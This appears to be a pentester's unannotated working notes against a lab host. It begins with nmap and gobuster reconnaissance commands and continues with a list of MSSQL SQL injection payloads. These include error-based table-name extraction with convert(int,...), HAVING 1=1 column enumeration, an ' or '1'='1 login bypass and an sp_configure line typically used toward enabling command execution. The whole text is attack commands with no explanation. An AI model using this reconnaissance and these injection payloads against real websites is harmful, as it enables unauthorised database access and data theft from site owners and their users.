nmap -sV -sC -Pn 10.11.1.229 > nmap.txt
gobuster dir  -u http://10.11.1.229/  -w /usr/share/dirb/wordlists/common.txt -x txt,php,cgi > gobuster.txt
gobuster dir  -u http://10.11.1.229/newsletter  -w /usr/share/dirb/wordlists/common.txt -x txt,php,cgi > gobusternewsletter.txt




',convert(int,(select top(1) table_name  from tables)))--
', user ' HAVING 1=1 -- )--
',HAVING 1=1 )--
' or '1'='1

', user=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users'))))--

' sp_configure 'show advanced options', 0;)--


SELECT * FROM news WHERE news_id='1' HAVING 1=1--'
', user  )--

?id=